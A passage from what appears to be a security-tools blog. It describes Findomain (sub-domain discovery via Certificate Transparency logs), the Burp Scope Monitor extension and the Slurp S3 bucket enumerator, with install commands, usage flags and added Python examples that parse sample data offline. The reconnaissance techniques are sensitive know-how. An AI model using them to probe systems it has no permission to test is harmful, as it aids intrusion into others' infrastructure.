<ul style="text-align: left;">
<li>Discover sub-domains without brute-force, it uses Certificate Transparency Logs.</li>
<li>Discover sub-domains with or without IP address according to user arguments.</li>
<li>Read target from user argument (-t).</li>
<li>Read a list of targets from file and discover their sub-domains with or without IP and also write to output files per-domain if specified by the user, recursively.</li>
<li>Write output to TXT file.</li>
<li>Write output to CSV file.</li>
<li>Write output to JSON file.</li>
<li>Cross platform support: Any platform.</li>
<li>Optional multiple API support.</li>
<li>Proxy support.</li>
</ul>
<br />
<b>Note: </b>the proxy support only applies to the API requests; the part that discovers the IP addresses of sub-domains doesn't support proxying and still uses the host network even if you use the -p option.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">How it works?</span></h3>
This tool doesn't use the common methods for sub-domain discovery; it uses Certificate Transparency logs to find sub-domains, and this method makes it the fastest and most reliable. The tool makes use of multiple publicly available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/<br />
<br />
<b><span style="color: #073763;">APIs in use at the moment:</span></b><br />
<ul style="text-align: left;">
<li>Certspotter: https://api.certspotter.com/</li>
<li>Crt.sh : https://crt.sh</li>
<li>Virustotal: https://www.virustotal.com/ui/domains/</li>
<li>Sublit3r: https://api.sublist3r.com/</li>
<li>Facebook: https://developers.facebook.com/docs/certificate-transparency</li>
</ul>
<br />
If you know of others that should be added, open an issue.<br />
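How a Certificate Transparency lookup turns into a sub-domain list, shown as an added example that is not Findomain's code. It parses a constructed response in the shape crt.sh returns for a JSON query (an array whose name_value field carries newline-separated names, which is an assumption of this example), drops wildcard labels, normalizes case and rejects look-alike names that merely begin with the zone. No network request is made. The same kind of query is what a domain owner runs to spot forgotten hosts or certificates nobody requested.<br />

```python
"""Turn Certificate Transparency search results into a deduplicated list of
sub-domains. Added example, not Findomain's code.

The input is a constructed sample in the shape crt.sh returns for
?q=%.example.com&output=json: a JSON array whose 'name_value' field holds
one or more newline-separated names. That field layout is an assumption of
this example.
"""
import json

# Constructed sample response; values chosen to exercise the edge cases:
# names only present in the SAN list, wildcards, mixed case, a look-alike
# name outside the queried zone, and duplicates across certificates.
SAMPLE_CRTSH_JSON = json.dumps([
    {"id": 1, "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com"},
    {"id": 2, "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\nDev.Example.com"},
    {"id": 3, "common_name": "mail.example.com",
     "name_value": "mail.example.com\nwww.example.com"},
    {"id": 4, "common_name": "example.com.evil.test",
     "name_value": "example.com.evil.test"},
    {"id": 5, "common_name": "old-vpn.example.com",
     "name_value": "old-vpn.example.com"},
])


def extract_subdomains(crtsh_json: str, zone: str) -> list:
    """Return sorted unique hostnames under `zone` found in a crt.sh result.

    Handles names that appear only in SAN lists (name_value), wildcard
    entries (the '*.' label is dropped, leaving the base the wildcard
    covers), case differences, and look-alike names that merely start
    with the zone string.
    """
    zone = zone.lower().strip(".")
    found = set()
    for entry in json.loads(crtsh_json):
        names = entry.get("name_value", "").split("\n")
        names.append(entry.get("common_name", ""))
        for raw in names:
            name = raw.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]
            # exact zone or a proper sub-domain of it, never "zone.other.tld"
            if name == zone or name.endswith("." + zone):
                found.add(name)
    return sorted(found)


if __name__ == "__main__":
    for host in extract_subdomains(SAMPLE_CRTSH_JSON, "example.com"):
        print(host)
```

A name coming out of this list is only evidence that a certificate was issued for it; whether the host still resolves is the separate step the post's "with or without IP address" option refers to.<br />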
<h3 style="text-align: left;">
<span style="color: #073763;">Supported platforms in our binary releases</span></h3>
All the binaries we provide are 64-bit only, and we don't have plans to add 32-bit binary releases; if you want 32-bit support, follow the documentation below.<br />
<ul style="text-align: left;">
<li>Linux</li>
<li>Windows</li>
<li>MacOS</li>
<li>ARM</li>
<li>Aarch64 (Raspberry Pi)</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Build for 32 bits or another platform</span></h3>
If you want to build the tool for your 32-bit system or another platform, follow these steps:<br />
<br />
Note: You need to have <a href="https://rust-lang.org/" target="_blank">rust</a>, <a href="http://www.gnu.org/software/make" target="_blank">make</a> and <a href="https://www.perl.org/" target="_blank">perl</a> installed on your system first.<br />
<br />
<b>Using the Github source code:</b><br />
<ul style="text-align: left;">
<li>Clone the repository or download the release source code.</li>
<li>Extract the release source code (only needed if you downloaded the compressed file).</li>
<li>Go to the folder where the source code is.</li>
<li>Execute <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">cargo build --release</span></li>
<li>Your binary is now in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">target/release/findomain</span> and you can use it.</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Installation Android (Termux)</span></h3>
Install the Termux package, open it and run these commands:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ pkg install rust make perl</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ cargo install findomain</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ cd $HOME/.cargo/bin</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ ./findomain</span><br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation in Linux using source code</span></h3>
You can install it either by compiling the source manually or by using the precompiled binary.<br />
<br />
Manually: You need to have rust, make and perl installed in your system first.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ git clone https://github.com/Edu4rdSHL/findomain.git</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ cd findomain</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ cargo build --release</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ sudo cp target/release/findomain /usr/bin/</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ findomain</span><br />
<br />
<h3 style="text-align: left;">
<b><span style="color: #073763;">Installation in Linux using compiled artifacts</span></b></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ chmod +x findomain-linux</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ ./findomain-linux</span><br />
<br />
<b>If you are using the BlackArch Linux distribution, you just need to use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ sudo pacman -S findomain</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation ARM</span></h3>
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-arm</span><br />
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ chmod +x findomain-arm</span><br />
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ ./findomain-arm</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation Aarch64 (Raspberry Pi)</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ chmod +x findomain-aarch64</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ ./findomain-aarch64</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation Windows</span></h3>
<b>Download the binary from </b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe</span><br />
<br />
Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.<br />
<br />
Run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain-windows</span> in the CMD shell.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation MacOS</span></h3>
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx</span><br />
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ chmod +x findomain-osx</span><br />
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ ./findomain-osx</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
You can use the tool in two ways: discovering only the sub-domain names, or discovering the sub-domains plus their IP addresses.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain 0.2.0</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">Eduard Tolosa <tolosaeduard@gmail.com></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">A tool that use Certificates Transparency logs to find subdomains.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">USAGE:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> findomain [FLAGS] [OPTIONS]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">FLAGS:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -a, --all-apis Use all the available APIs to perform the search. It take more time but you will have a lot of</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> more results.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -h, --help Prints help information</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -i, --get-ip Return the subdomain list with IP address if resolved.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -V, --version Prints version information</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">OPTIONS:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -f, --file <file> Sets the input file to use.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -o, --output <output> Write data to output file in the specified format. [possible values: txt, csv, json]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -p, --proxy <proxy> Use a proxy to make the requests to the APIs.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -t, --target <target> Target host</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Examples</span></h3>
<b>Make a simple search of subdomains and print the info in the screen:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com</span><br />
<br />
<b>Make a simple search of subdomains using all the APIs and print the info in the screen:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -a</span><br />
<br />
<b>Make a search of subdomains and export the data to a CSV file:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -o csv</span><br />
<br />
<b>Make a search of subdomains using all the APIs and export the data to a CSV file:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -a -o csv</span><br />
<br />
<b>Make a search of subdomains and resolve the IP address of subdomains (if possible):</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -i</span><br />
<br />
<b>Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -i -a</span><br />
<br />
<b>Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -i -a -o csv</span><br />
<br />
<b>Make a search of subdomains using a proxy (http://127.0.0.1:8080 in this case; the rest of the arguments work the same way, you just need to add the -p flag to the previous commands):</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -p http://127.0.0.1:8080</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/Edu4rdSHL/findomain" target="_blank">Download FinDomain</a></span></div>
Published 2019-08-21T17:15:00.001+05:30: Burp Suite Extension - To Monitor And Keep Track of Tested Endpoints<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTckI2CxGVLzPKMSwcA2ZOBhaHSj02I_rGlaCyMrgjMKk9WW7RYzZTqMX-jkRmo4PzzeRoeLS44RfgPtyqBYE4zDgIUsSo104p_q5Ttq-jj_KeEQFMWKBOx3uxP_mF2hgKXSLk9Z1H2Lg1/s1600/Burp+Scope+Monitor+Extension.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="415" data-original-width="649" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTckI2CxGVLzPKMSwcA2ZOBhaHSj02I_rGlaCyMrgjMKk9WW7RYzZTqMX-jkRmo4PzzeRoeLS44RfgPtyqBYE4zDgIUsSo104p_q5Ttq-jj_KeEQFMWKBOx3uxP_mF2hgKXSLk9Z1H2Lg1/s1600/Burp+Scope+Monitor+Extension.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">Burp Scope Monitor Extension</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">A Burp Suite Extension to monitor and keep track of tested endpoints.</span></h3>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Main Features</span></h3>
<br />
<ul style="text-align: left;">
<li>Simple, easy way to keep track of unique endpoints when testing an application</li>
<li>Mark individual endpoints as analyzed or not</li>
<li>Instantly see when a new, not yet tested endpoint is requested</li>
<li>Accessible from Proxy tab (right click, mark request as analyzed/not)</li>
<li>Send to Repeater</li>
<li>Enforcement of Burp's in scope rules</li>
<li>Import/Export state file directly to a CSV file for</li>
<li>Autosave option</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEt7qG9zpblFR2vmNXmCniz-kKVgvvLNTQgRPQI_fRRj_sk9kr_hjbD-dcy17fyUBj7gGwN9EuvOyRWbrlz0mEZx995lyHkvljz7_9XntOp36ufgjxuCqyIzmRI8_ov4n7BmMyKA7BRjPX/s1600/Burp+Scope+Monitor+Extension.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="794" data-original-width="1438" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEt7qG9zpblFR2vmNXmCniz-kKVgvvLNTQgRPQI_fRRj_sk9kr_hjbD-dcy17fyUBj7gGwN9EuvOyRWbrlz0mEZx995lyHkvljz7_9XntOp36ufgjxuCqyIzmRI8_ov4n7BmMyKA7BRjPX/s640/Burp+Scope+Monitor+Extension.gif" width="640" /></a></div>
<div>
<br /></div>
<br />
<h3 style="text-align: left;">
Installation</h3>
<br />
<ol style="text-align: left;">
<li>Make sure you have Jython configured under <b>Extender -> Options -> Python Environment. </b>For further instructions, check PortSwigger's official instructions on their support page.</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: Courier New, Courier, monospace;">git clone git@github.com:Regala/burp-scope-monitor.git</span></li>
<li>Import <span style="background-color: #f3f3f3; color: #274e13; font-family: Courier New, Courier, monospace;">main.py</span> in Extender - <b>Extender -> Extensions -> Add -> Select Python -> Select main.py</b></li>
</ol>
<br />
<br />
<h3 style="text-align: left;">
Documentation</h3>
Most of the options available in the General and Import tabs are self-explanatory.<br />
<br />
<br />
<ul style="text-align: left;">
<li>"Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.</li>
<li>"Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine this option with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes, as the color palette is limited.</li>
<li>"Autosave periodically" - backs up the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor", in order to maintain a different state file per Burp project. However, you can easily maintain only one master state file.</li>
<li>"Import/Export" is dedicated to handling the saved state files. It's preferable to open the Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is because we do not store the actual requests, just the endpoint, its analyzed status and a few other fields, which makes it a little more efficient).</li>
</ul>
<br />
<h3 style="text-align: left;">
Future Development</h3>
<br />
<ul style="text-align: left;">
<li>Keep track of parameters observed in all requests</li>
<li>Highlight when a new parameter was used in an already observed/analyzed endpoint</li>
<li>Export to spreadsheet / Google Sheets</li>
<li>Adding notes to the endpoint</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Implementation</span></h3>
The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.<br />
<br />
To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.<br />
<br />
You can still add comments on the items as you normally would, but make sure to keep the placeholder string (scope-monitor-placeholder) there.<br />
<br />
Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and faster. With large state files, this might hang a bit when loading.<br />
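What the extension stores per entry (endpoint identity plus analyzed status, as described above) and the behaviour listed under Main Features and Documentation can be modelled outside Burp. The code below is an added example written for this page, not the extension's own code: it reduces a request to a (method, host, path) key, enforces a scope list that stands in for Burp's in-scope rules (an assumption; the real extension defers to Burp's scope check), marks Repeater requests as analyzed automatically, and round-trips the state through CSV. The host names are made up.<br />

```python
import csv
import io
from urllib.parse import urlsplit

# Hypothetical scope: host suffixes standing in for Burp's in-scope rules (assumption).
IN_SCOPE_HOSTS = ("app.example.test",)


def endpoint_key(method, url):
    """Reduce a request to the (METHOD, host, path) tuple used as its identity.

    The query string is dropped so that /search?q=a and /search?q=b count as
    one endpoint; the path keeps its case because many servers are case-sensitive.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    return (method.upper(), host, path)


def in_scope(url):
    """True when the URL's host is, or is under, one of the scoped hosts."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in IN_SCOPE_HOSTS)


class ScopeMonitor:
    """Tracks unique in-scope endpoints and whether each has been analyzed."""

    def __init__(self):
        self.endpoints = {}  # (method, host, path) -> analyzed flag

    def observe(self, method, url, from_repeater=False):
        """Record a request; return True only for a never-seen, in-scope endpoint."""
        if not in_scope(url):
            return False
        key = endpoint_key(method, url)
        is_new = key not in self.endpoints
        if is_new:
            self.endpoints[key] = False
        if from_repeater:  # "Repeater request automatically marks as analyzed"
            self.endpoints[key] = True
        return is_new

    def mark(self, method, url, analyzed=True):
        """Equivalent of the Proxy-tab right-click 'mark as analyzed/not'."""
        self.endpoints[endpoint_key(method, url)] = analyzed

    def pending(self):
        """Endpoints observed but not yet analyzed, in a stable order."""
        return sorted(k for k, done in self.endpoints.items() if not done)

    def export_csv(self):
        """Serialise the state file; only the key and the flag are stored."""
        buf = io.StringIO()
        writer = csv.writer(buf)
        writer.writerow(["method", "host", "path", "analyzed"])
        for (method, host, path), done in sorted(self.endpoints.items()):
            writer.writerow([method, host, path, int(done)])
        return buf.getvalue()

    @classmethod
    def import_csv(cls, text):
        """Rebuild a monitor from a state file produced by export_csv."""
        monitor = cls()
        for row in csv.DictReader(io.StringIO(text)):
            key = (row["method"], row["host"], row["path"])
            monitor.endpoints[key] = row["analyzed"] == "1"
        return monitor


if __name__ == "__main__":
    m = ScopeMonitor()
    print(m.observe("GET", "https://app.example.test/login?next=/"))   # new endpoint
    print(m.observe("GET", "https://app.example.test/login?next=/x"))  # same endpoint
    print(m.observe("POST", "https://app.example.test/api/users", from_repeater=True))
    print(m.pending())
    print(m.export_csv())
```

Inside Burp the extension runs under Jython (Python 2.7), so the <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">urllib.parse</span> import would become <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">urlparse</span> and the scope check would call Burp's callbacks; the identity and CSV logic carry over unchanged.<br />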
<br />
<span style="font-size: large;"><a href="https://github.com/Regala/burp-scope-monitor" target="_blank">Download Burp Scope Monitor </a></span></div>
Published 2019-08-08T03:17:00.001+05:30: Slurp- To Security Audits of S3 Buckets Enumerator<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAtOFAr9yXeqBcjq83KlgyCzlvQAF4hKLXkgSHRCtzLzYoEx6-9z_XnPuUR8Fl6iea1fEFafXSupbZzKMVnZFxVT2wFXs3iqazZyynI9IU_RX5Q-_XdVACYjhKN4W2KYpb7YMHBS97syb0/s1600/Slurp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="662" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAtOFAr9yXeqBcjq83KlgyCzlvQAF4hKLXkgSHRCtzLzYoEx6-9z_XnPuUR8Fl6iea1fEFafXSupbZzKMVnZFxVT2wFXs3iqazZyynI9IU_RX5Q-_XdVACYjhKN4W2KYpb7YMHBS97syb0/s1600/Slurp.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">Slurp- Blackbox/Whitebox S3 Bucket Enumerator</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">To Evaluate the security of S3 buckets</span></h3>
<div>
<span style="color: #073763;"><br /></span></div>
<h3 style="text-align: left;">
<span style="color: #073763;">Overview</span></h3>
<ul style="text-align: left;">
<li>Credit to all the vendored packages that made developing Slurp possible.</li>
<li>Slurp is for pen-testers and security professionals to perform audits of s3 buckets.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features</span></h3>
<ul style="text-align: left;">
<li>Scan via domain(s); you can target a single domain or a list of domains</li>
<li>Scan via keyword(s); you can target a single keyword or a list of keywords</li>
<li>Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed</li>
<li>Colorized output for visual grep</li>
<li>Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)</li>
<li>Punycode support for internationalized domains</li>
<li>Strong copyleft license (GPLv3)</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Modes</span></h3>
This tool operates in two modes: blackbox and whitebox. Whitebox (or internal) mode is significantly faster than blackbox (external) mode.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Blackbox (external)</span></h3>
In this mode, you are using the permutations list to conduct scans. It will return false positives, and there is no way to link the buckets to an actual AWS account! Do not open issues asking how to do this.<br />
<br />
<b>Domain</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgySSmj7MDV812WxvczpU91g8iy_T4SJjRrSnQayYgtH7MhnnMEmAaCT_TQmx_-_e1tK_A7CRJxhEDNsi_mBFvwKGMylAJmv5I05an789pxTZekJCg6jYkA_TzsyMysUX3l99HhyFAHmwGU/s1600/Slurp+domain+Testing.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="193" data-original-width="776" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgySSmj7MDV812WxvczpU91g8iy_T4SJjRrSnQayYgtH7MhnnMEmAaCT_TQmx_-_e1tK_A7CRJxhEDNsi_mBFvwKGMylAJmv5I05an789pxTZekJCg6jYkA_TzsyMysUX3l99HhyFAHmwGU/s640/Slurp+domain+Testing.png" width="640" /></a></div>
<br />
<b>Keywords</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfmUGhRrIOpmnL98EUfkaJFiHYWtl9oSKbIIWyNNTxhMuZT-HIHTYTSxjU018yFGoLO8_m7b8F0r5jSg5iSPOcCbANU0wIfbtyclwT-8hBR6Ghrlp6CyHd25rBiMcNmX1moPtcxusGjstL/s1600/Slurp+keywords.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="731" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfmUGhRrIOpmnL98EUfkaJFiHYWtl9oSKbIIWyNNTxhMuZT-HIHTYTSxjU018yFGoLO8_m7b8F0r5jSg5iSPOcCbANU0wIfbtyclwT-8hBR6Ghrlp6CyHd25rBiMcNmX1moPtcxusGjstL/s1600/Slurp+keywords.png" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Whitebox (internal)</span></h3>
In this mode, you are using the AWS API with credentials for a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that I will not provide support on how to use the AWS API.<br />
<br />
Your credentials should be in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><b>~/.aws/credentials</b></span>.<br />
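The Policy/ACL check that whitebox mode performs can be shown offline. The following Python is an added example for this page, not Slurp's code (Slurp is written in Go): it evaluates a bucket policy document of the kind get_bucket_policy returns as a JSON string, and an ACL of the shape get_bucket_acl returns, and reports grants that open the bucket to everyone. The bucket names, owner id and VPC endpoint id are constructed placeholders, and treating any Condition as "not public" is a deliberate simplification.<br />

```python
import json

# Group URIs that make an ACL grant reachable by anyone or by any AWS account.
PUBLIC_ACL_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

# Constructed sample inputs (not real buckets). A bucket policy is delivered as
# a JSON string; an ACL result is a dict carrying a "Grants" list.
PUBLIC_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::constructed-public-bucket/*"}],
})
# Same wildcard principal, but narrowed by a Condition (the endpoint id is a placeholder).
RESTRICTED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
                   "Action": ["s3:GetObject"],
                   "Resource": "arn:aws:s3:::constructed-private-bucket/*",
                   "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-PLACEHOLDER"}}}],
})
PUBLIC_ACL = {
    "Owner": {"ID": "owner-id-PLACEHOLDER"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-PLACEHOLDER"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}


def policy_public_statements(policy):
    """Allow statements with a wildcard principal and no Condition: (Sid, actions)."""
    doc = json.loads(policy) if isinstance(policy, str) else policy
    statements = doc.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be given bare
        statements = [statements]
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        aws = principal.get("AWS") if isinstance(principal, dict) else principal
        wildcard = "*" in aws if isinstance(aws, list) else aws == "*"
        # Simplification: any Condition is taken to restrict the statement.
        if wildcard and not stmt.get("Condition"):
            actions = stmt.get("Action", [])
            findings.append((stmt.get("Sid", ""),
                             actions if isinstance(actions, list) else [actions]))
    return findings


def acl_public_grants(acl):
    """Permissions granted to the AllUsers / AuthenticatedUsers groups: (group, permission)."""
    grants = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_ACL_URIS:
            grants.append((grantee["URI"].rsplit("/", 1)[-1], grant.get("Permission")))
    return grants


def audit_bucket(name, policy=None, acl=None):
    """Human-readable findings for one bucket; an empty list means nothing public."""
    issues = []
    if policy:
        for sid, actions in policy_public_statements(policy):
            issues.append("policy statement %r allows %s to everyone" % (sid, ",".join(actions)))
    if acl:
        for group, perm in acl_public_grants(acl):
            issues.append("ACL grants %s to %s" % (perm, group))
    return issues


if __name__ == "__main__":
    for bucket, pol, acl in [("constructed-public-bucket", PUBLIC_POLICY, PUBLIC_ACL),
                             ("constructed-private-bucket", RESTRICTED_POLICY, None)]:
        print(bucket, audit_bucket(bucket, policy=pol, acl=acl) or "no public access found")
```

Wiring this to a real account means iterating list_buckets and feeding each bucket's get_bucket_policy and get_bucket_acl results into <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">audit_bucket</span>; buckets without a policy raise on the policy call and should simply be audited on their ACL alone.<br />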
<br />
